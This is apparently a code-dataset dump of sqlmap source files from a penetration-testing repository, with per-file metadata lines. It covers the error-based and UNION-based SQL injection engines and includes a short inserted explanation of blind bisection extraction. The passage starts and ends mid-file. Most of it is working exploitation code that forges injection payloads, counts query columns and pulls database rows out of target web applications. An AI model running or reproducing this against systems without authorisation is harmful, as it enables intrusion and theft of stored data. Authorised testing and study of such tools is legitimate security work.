kb.prependFlag = False kb.stickyLevel = None retrievedLength = len(finalValue or "") if finalValue is not None: finalValue = decodeHexValue(finalValue) if conf.hexConvert else finalValue hashDBWrite(expression, finalValue) elif partialValue: hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue)) if conf.hexConvert and not abortedFlag and not hasattr(conf, "api"): infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime("%X"), filterControlChars(finalValue), " " * retrievedLength) dataToStdout(infoMsg) else: if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): dataToStdout("\n") if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3: infoMsg = "retrieved: %s" % filterControlChars(finalValue) logger.info(infoMsg) if kb.threadException: raise SqlmapThreadException("something unexpected happened inside the threads") if abortedFlag: raise KeyboardInterrupt _ = finalValue or partialValue return getCounter(kb.technique), safecharencode(_) if kb.safeCharEncode else _ def queryOutputLength(expression, payload): """ Returns the query output length. """ infoMsg = "retrieving the length of query output" logger.info(infoMsg) lengthExprUnescaped = agent.forgeQueryOutputLength(expression) start = time.time() count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) logger.debug(debugMsg) if length == " ": length = 0 return length
27,658
Python
.py
485
39.309278
186
0.555621
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
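bisection() above retrieves each character with a binary search over the charset, so a 95-symbol printable range costs about seven requests per character instead of 95. The core loop, reduced to a hypothetical boolean oracle (in the real code the oracle is one Request.queryPage() call asking "is the character at this index greater than X?"):

def get_char(oracle, idx, charset):
    """Binary search for the character at position idx (charset must be sorted)."""
    lo, hi = 0, len(charset) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(idx, charset[mid]):      # True: target character sorts above the midpoint
            lo = mid + 1
        else:
            hi = mid
    return charset[lo]

secret = "admin"                            # what the DBMS knows and we do not
charset = [chr(c) for c in range(32, 127)]  # printable ASCII, like getCharset() output
oracle = lambda idx, ch: secret[idx] > ch   # stands in for one injected request
print("".join(get_char(oracle, i, charset) for i in range(len(secret))))   # -> admin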
18,964
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/blind/__init__.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,965
use.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/error/use.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re import time from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout from lib.core.common import decodeHexValue from lib.core.common import extractRegexResult from lib.core.common import getPartRun from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter from lib.core.common import initTechnique from lib.core.common import isListLike from lib.core.common import isNumPosStrValue from lib.core.common import listToStrValue from lib.core.common import readInput from lib.core.common import unArrayizeValue from lib.core.convert import hexdecode from lib.core.convert import htmlunescape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS from lib.core.enums import HTTP_HEADER from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH from lib.core.settings import NULL from lib.core.settings import PARTIAL_VALUE_MARKER from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request from lib.utils.progress import ProgressBar def _oneShotErrorUse(expression, field=None): offset = 1 partialValue = None threadData = getCurrentThreadData() retVal = hashDBRetrieve(expression, checkConf=True) if retVal and PARTIAL_VALUE_MARKER in retVal: partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") logger.info("resuming partial value: '%s'" % _formatPartialContent(partialValue)) offset += len(partialValue) threadData.resumed = retVal is not None and not partialValue if Backend.isDbms(DBMS.MYSQL): chunk_length = MYSQL_ERROR_CHUNK_LENGTH elif Backend.isDbms(DBMS.MSSQL): chunk_length = MSSQL_ERROR_CHUNK_LENGTH else: chunk_length = None if retVal is None or partialValue: try: while True: check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) trimcheck = "%s(?P<result>[^<]*)" % (kb.chars.start) if field: nulledCastedField = agent.nullAndCastField(field) if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")): # skip chunking of scalar expression (unneeded) extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) if extendedField != field: # e.g. 
MIN(surname) nulledCastedField = extendedField.replace(field, nulledCastedField) field = extendedField nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) # Forge the error-based SQL injection request vector = kb.injection.data[kb.technique].vector query = agent.prefixQuery(vector) query = agent.suffixQuery(query) injExpression = expression.replace(field, nulledCastedField, 1) if field else expression injExpression = unescaper.escape(injExpression) injExpression = query.replace("[QUERY]", injExpression) payload = agent.payload(newValue=injExpression) # Perform the request page, headers = Request.queryPage(payload, content=True, raise404=False) incrementCounter(kb.technique) if page and conf.noEscape: page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page) # Parse the returned page to get the exact error-based # SQL injection output output = reduce(lambda x, y: x if x is not None else y, (\ extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \ extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ if headers else None), re.DOTALL | re.IGNORECASE), \ extractRegexResult(check, threadData.lastRedirectMsg[1] \ if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \ None) if output is not None: output = getUnicode(output) else: trimmed = extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \ or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ if headers else None), re.DOTALL | re.IGNORECASE) \ or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \ if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) if trimmed: warnMsg = "possible server trimmed output detected " warnMsg += "(due to its length and/or content): " warnMsg += safecharencode(trimmed) logger.warn(warnMsg) if not kb.testMode: check = "(?P<result>.*?)%s" % kb.chars.stop[:2] output = extractRegexResult(check, trimmed, re.IGNORECASE) if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)): if offset == 1: retVal = output else: retVal += output if output else '' if output and len(output) >= chunk_length: offset += chunk_length else: break if kb.fileReadMode and output: dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) else: retVal = output break except: if retVal is not None: hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) raise retVal = decodeHexValue(retVal) if conf.hexConvert else retVal if isinstance(retVal, basestring): retVal = htmlunescape(retVal).replace("<br>", "\n") retVal = _errorReplaceChars(retVal) if retVal is not None: hashDBWrite(expression, retVal) else: _ = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal return safecharencode(retVal) if kb.safeCharEncode else retVal def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False): values = [] origExpr = None threadData = getCurrentThreadData() for field in expressionFieldsList: output = None if field.startswith("ROWNUM "): continue if isinstance(num, int): origExpr = expression expression = agent.limitQuery(num, 
expression, field, expressionFieldsList[0]) if "ROWNUM" in expressionFieldsList: expressionReplaced = expression else: expressionReplaced = expression.replace(expressionFields, field, 1) output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field) if not kb.threadContinue: return None if not suppressOutput: if kb.fileReadMode and output and output.strip(): print elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(output))) if isinstance(num, int): expression = origExpr values.append(output) return values def _errorReplaceChars(value): """ Restores safely replaced characters """ retVal = value if value: retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#") return retVal def _formatPartialContent(value): """ Prepares (possibly hex-encoded) partial content for safe console output """ if value and isinstance(value, basestring): try: value = hexdecode(value) except: pass finally: value = safecharencode(value) return value def errorUse(expression, dump=False): """ Retrieve the output of a SQL query taking advantage of the error-based SQL injection vulnerability on the affected parameter. """ initTechnique(kb.technique) abortedFlag = False count = None emptyFields = [] start = time.time() startLimit = 0 stopLimit = None value = None _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None # We have to check if the SQL query might return multiple entries # and in such case forge the SQL limiting the query output one # entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \ expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \ or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in expression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] _, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression) count = unArrayizeValue(_oneShotErrorUse(countedExpression, countedExpressionFields)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and not count.isdigit(): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. 
" warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: message = "due to huge table size do you want to remove " message += "ORDER BY clause gaining speed over consistency? [y/N] " _ = readInput(message, default="N") if _ and _[0] in ("y", "Y"): expression = expression[:expression.index(" ORDER BY ")] numThreads = min(conf.threads, (stopLimit - startLimit)) threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.counter = 0 threadData.shared.lastFlushed = startLimit - 1 threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): for field in expressionFieldsList: if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': emptyFields.append(field) debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) debugMsg += "dumped as it appears to be empty" logger.debug(debugMsg) if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def errorThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: valueStart = time.time() threadData.shared.counter += 1 num = threadData.shared.limits.next() except StopIteration: break output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) if not kb.threadContinue: break if output and isListLike(output) and len(output) == 1: output = output[0] with kb.locks.value: index = None if threadData.shared.showEta: threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) for index in xrange(len(threadData.shared.buffered)): if threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, output)) while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: threadData.shared.lastFlushed += 1 threadData.shared.value.append(threadData.shared.buffered[0][1]) del threadData.shared.buffered[0] runThreads(numThreads, errorThread) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: value = _errorFields(expression, expressionFields, expressionFieldsList) if value and isListLike(value) and len(value) == 1 and isinstance(value[0], basestring): value = value[0] duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[kb.technique], duration) logger.debug(debugMsg) return value
17,623
Python
.py
326
40.726994
186
0.609085
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
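The errorUse() routine in the file above fetches one row per error-based request across several threads, and keeps the final output in row order by buffering out-of-order results until the next expected index arrives (the threadData.shared.buffered / lastFlushed bookkeeping). Below is a minimal standalone sketch of that ordered-flush pattern; all names are illustrative, and fetch_row stands in for the _errorFields() request, so this is a sketch of the idea rather than sqlmap's implementation:

import bisect
import threading

def ordered_fetch(fetch_row, start, stop, num_threads=4):
    """Fetch rows start..stop-1 concurrently but emit them in index order,
    mirroring the buffered/lastFlushed bookkeeping used by errorUse()."""
    limits = iter(range(start, stop))
    lock = threading.Lock()
    buffered = []                    # sorted (index, row) pairs awaiting flush
    emitted = []                     # rows already flushed, in index order
    state = {"last_flushed": start - 1}

    def worker():
        while True:
            with lock:
                num = next(limits, None)
            if num is None:
                break
            row = fetch_row(num)     # stands in for one error-based request
            with lock:
                # indices are unique, so tuple comparison never reaches 'row'
                bisect.insort(buffered, (num, row))
                # flush every row now contiguous with what was already emitted
                while buffered and buffered[0][0] == state["last_flushed"] + 1:
                    state["last_flushed"] += 1
                    emitted.append(buffered.pop(0)[1])

    threads = [threading.Thread(target=worker) for _ in range(num_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return emitted

# e.g. ordered_fetch(lambda n: "row-%d" % n, 0, 10) returns rows in order 0..9
# regardless of which thread finished first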
18,966
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/error/__init__.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,967
test.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/union/test.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import random import re from lib.core.agent import agent from lib.core.common import average from lib.core.common import Backend from lib.core.common import isNullValue from lib.core.common import listToStrValue from lib.core.common import popValue from lib.core.common import pushValue from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import removeReflectiveValues from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import stdev from lib.core.common import wasLastResponseDBMSError from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import PAYLOAD from lib.core.settings import LIMITED_ROWS_TEST_NUMBER from lib.core.settings import UNION_MIN_RESPONSE_CHARS from lib.core.settings import UNION_STDEV_COEFF from lib.core.settings import MIN_RATIO from lib.core.settings import MAX_RATIO from lib.core.settings import MIN_STATISTICAL_RANGE from lib.core.settings import MIN_UNION_RESPONSES from lib.core.settings import NULL from lib.core.settings import ORDER_BY_STEP from lib.core.unescaper import unescaper from lib.request.comparison import comparison from lib.request.connect import Connect as Request def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL): """ Finds number of columns affected by UNION based injection """ retVal = None def _orderByTechnique(): def _orderByTest(cols): query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I) if _orderByTest(1) and not _orderByTest(randomInt()): infoMsg = "ORDER BY technique seems to be usable. " infoMsg += "This should reduce the time needed " infoMsg += "to find the right number " infoMsg += "of query columns. 
Automatically extending the " infoMsg += "range for current UNION query injection technique test" singleTimeLogMessage(infoMsg) lowCols, highCols = 1, ORDER_BY_STEP found = None while not found: if _orderByTest(highCols): lowCols = highCols highCols += ORDER_BY_STEP else: while not found: mid = highCols - (highCols - lowCols) / 2 if _orderByTest(mid): lowCols = mid else: highCols = mid if (highCols - lowCols) < 2: found = lowCols return found pushValue(kb.errorIsNone) items, ratios = [], [] kb.errorIsNone = False lowerCount, upperCount = conf.uColsStart, conf.uColsStop if lowerCount == 1: found = kb.orderByColumns or _orderByTechnique() if found: kb.orderByColumns = found infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") singleTimeLogMessage(infoMsg) return found if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: upperCount = lowerCount + MIN_UNION_RESPONSES min_, max_ = MAX_RATIO, MIN_RATIO pages = {} for count in xrange(lowerCount, upperCount + 1): query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) if not isNullValue(kb.uChar): pages[count] = page ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO ratios.append(ratio) min_, max_ = min(min_, ratio), max(max_, ratio) items.append((count, ratio)) if not isNullValue(kb.uChar): for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar): contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()] if len(filter(lambda x: x[1], contains)) == 1: retVal = filter(lambda x: x[1], contains)[0][0] break if not retVal: ratios.pop(ratios.index(min_)) ratios.pop(ratios.index(max_)) minItem, maxItem = None, None for item in items: if item[1] == min_: minItem = item elif item[1] == max_: maxItem = item if all(map(lambda x: x == min_ and x != max_, ratios)): retVal = maxItem[0] elif all(map(lambda x: x != min_ and x == max_, ratios)): retVal = minItem[0] elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: deviation = stdev(ratios) lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation if min_ < lower: retVal = minItem[0] if max_ > upper: if retVal is None or abs(max_ - upper) > abs(min_ - lower): retVal = maxItem[0] kb.errorIsNone = popValue() if retVal: infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal singleTimeLogMessage(infoMsg) return retVal def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL): validPayload = None vector = None positions = range(0, count) # Unbiased approach for searching appropriate usable column random.shuffle(positions) # For each column of the table (# of NULL) perform a request using # the UNION ALL SELECT statement to test it the target URL is # affected by an exploitable union SQL injection vulnerability for position in positions: # Prepare expression with delimiters randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) randQueryUnescaped = unescaper.escape(randQueryProcessed) # Forge the union SQL injection request query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) payload = agent.payload(place=place, 
parameter=parameter, newValue=query, where=where) # Perform the request page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ payload, True) or "") if content and phrase in content: validPayload = payload kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) if where == PAYLOAD.WHERE.ORIGINAL: # Prepare expression with delimiters randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) # Confirm that it is a full union SQL injection query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") if not all(_ in content for _ in (phrase, phrase2)): vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) elif not kb.unionDuplicates: fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) # Check for limited row output query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ payload, True) or "") if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: warnMsg = "output with limited number of rows detected. Switching to partial mode" logger.warn(warnMsg) vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False) unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() if unionErrorCase and count > 1: warnMsg = "combined UNION/error-based SQL injection case found on " warnMsg += "column %d. 
sqlmap will try to find another " % (position + 1) warnMsg += "column with better characteristics" logger.warn(warnMsg) else: break return validPayload, vector def _unionConfirm(comment, place, parameter, prefix, suffix, count): validPayload = None vector = None # Confirm the union SQL injection and get the exact column # position which can be used to extract data validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count) # Assure that the above function found the exploitable full union # SQL injection position if not validPayload: validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE) return validPayload, vector def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): """ This method tests if the target URL is affected by an union SQL injection vulnerability. The test is done up to 50 columns on the target database table """ validPayload = None vector = None # In case that user explicitly stated number of columns affected if conf.uColsStop == conf.uColsStart: count = conf.uColsStart else: count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE) if count: validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]): warnMsg = "if UNION based SQL injection is not detected, " warnMsg += "please consider " if not conf.uChar and count > 1 and kb.uChar == NULL: message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] " test = readInput(message, default="Y") if test[0] not in ("y", "Y"): warnMsg += "usage of option '--union-char' " warnMsg += "(e.g. '--union-char=1') " else: conf.uChar = kb.uChar = str(randomInt(2)) validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) if not conf.dbms: if not conf.uChar: warnMsg += "and/or try to force the " else: warnMsg += "forcing the " warnMsg += "back-end DBMS (e.g. '--dbms=mysql') " if not all([validPayload, vector]) and not warnMsg.endswith("consider "): singleTimeWarnMessage(warnMsg) return validPayload, vector def unionTest(comment, place, parameter, value, prefix, suffix): """ This method tests if the target URL is affected by an union SQL injection vulnerability. The test is done up to 3*50 times """ if conf.direct: return kb.technique = PAYLOAD.TECHNIQUE.UNION validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) if validPayload: validPayload = agent.removePayloadDelimiters(validPayload) return validPayload, vector
13,949
Python
.py
254
44.425197
244
0.644031
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
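The _orderByTechnique() helper in the file above narrows down the column count by probing ORDER BY N: it doubles an upper bound in ORDER_BY_STEP increments until the probe fails, then bisects between the last working and first failing value. A self-contained sketch of that search follows, with the probe reduced to an arbitrary predicate instead of an HTTP request; ORDER_BY_STEP's real value lives in lib/core/settings.py, so 10 here is only a stand-in:

ORDER_BY_STEP = 10  # stand-in for lib.core.settings.ORDER_BY_STEP

def find_column_count(order_by_works):
    """Return the highest N for which ORDER BY N succeeds, given a boolean
    probe -- the doubling-then-bisecting walk used by _orderByTechnique()."""
    if not order_by_works(1):
        return None
    low, high = 1, ORDER_BY_STEP
    while True:
        if order_by_works(high):
            low = high
            high += ORDER_BY_STEP
        else:
            while high - low >= 2:
                mid = high - (high - low) // 2
                if order_by_works(mid):
                    low = mid
                else:
                    high = mid
            return low

# e.g. against a query with 7 columns: find_column_count(lambda n: n <= 7) == 7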
18,968
use.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/union/use.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re import time from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import arrayizeValue from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import extractRegexResult from lib.core.common import flattenValue from lib.core.common import getConsoleWidth from lib.core.common import getPartRun from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter from lib.core.common import initTechnique from lib.core.common import isListLike from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import listToStrValue from lib.core.common import parseUnionPage from lib.core.common import removeReflectiveValues from lib.core.common import singleTimeDebugMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import wasLastResponseDBMSError from lib.core.convert import htmlunescape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapSyntaxException from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request from lib.utils.progress import ProgressBar from thirdparty.odict.odict import OrderedDict def _oneShotUnionUse(expression, unpack=True, limited=False): retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted threadData = getCurrentThreadData() threadData.resumed = retVal is not None if retVal is None: # Prepare expression with delimiters injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) # Forge the union SQL injection request vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector kb.unionDuplicates = vector[7] kb.forcePartialUnion = vector[8] query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] payload = agent.payload(newValue=query, where=where) # Perform the request page, headers = Request.queryPage(payload, content=True, raise404=False) incrementCounter(PAYLOAD.TECHNIQUE.UNION) # Parse the returned page to get the exact union-based # SQL injection output def _(regex): return reduce(lambda x, y: x if x is not None else y, (\ extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ if headers else None), payload, True), 